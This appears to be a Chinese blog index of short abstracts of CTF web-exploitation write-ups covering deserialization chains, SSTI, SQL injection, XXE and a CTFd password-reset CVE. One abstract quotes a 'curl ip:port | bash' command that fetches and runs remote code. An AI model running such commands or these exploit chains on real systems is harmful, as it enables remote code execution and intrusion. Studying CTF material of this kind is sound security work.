摘要:
route 阅读全文
摘要:
前言 一道typecho1.2的反序列化,顺便记录一下踩的坑 www.zip获得源码,结构大致如下 flag.php需要ssrf,如果成功会写入session 拿到源码直接去网上先找了一下有没有现成的payload(懒, 找到一篇类似的 "https://p0sec.net/index.php/ar 阅读全文
摘要:
fakegoogle SSTI old hack tp5.0.23 duangShell .index.php.swp泄漏 curl ip:port\ 或curl ip port | bash 简单注入 过滤了单引号、select、mid、and、=等常用字符,思路如下: 用\转义username的 阅读全文
摘要:
ad_js sql注入 数字型注入 common.inc.php sql注入 此文件在include下,应该是一些基础的函数或配置,所以任何包含此文件的都可以进行注入emmm 找到publish.php,正好包含了该文件 common.inc.php注入点: 可以看到如果没有进行登陆,并且只有$_C 阅读全文
摘要:
[GoogleCTF2019 Quals]Bnv 考点:本地DTD文件利用XXE漏洞 payload: 顺便贴一下无回显的xxe: [HarekazeCTF2019]Easy Notes 目标: 通读代码发现只有写note才能放到session中 然后export.php能将note的内容打包下载: 阅读全文
摘要:
sqlcheckin sql注入 "https://blog.csdn.net/nzjdsds/article/details/82980041" 直接看例子: like也是一样 false false 得到true,令username:xxx'=',password:xxx'=',payload: 阅读全文
摘要:
HappyCTFd 考点: CVE 2020 7245 "https://www.colabug.com/2020/0204/6940556/" 利用方式: 注册一个如下账号,这里邮箱为buu上的内网邮箱系统 前往/reset_password找回密码 发送完成后把我们注册的用户名改一下: 然后用邮 阅读全文
摘要:
安洵杯iamthinking tp6pop链 考点: 1.tp6.0反序列化链 2.parse_url()绕过 利用链: tp6.0与tp5.2的后半部分利用链一样,但是官方和composer都找不到tp5.2的源码了,将就着看一下吧 首先入口点是在think\Model::__destruct() 阅读全文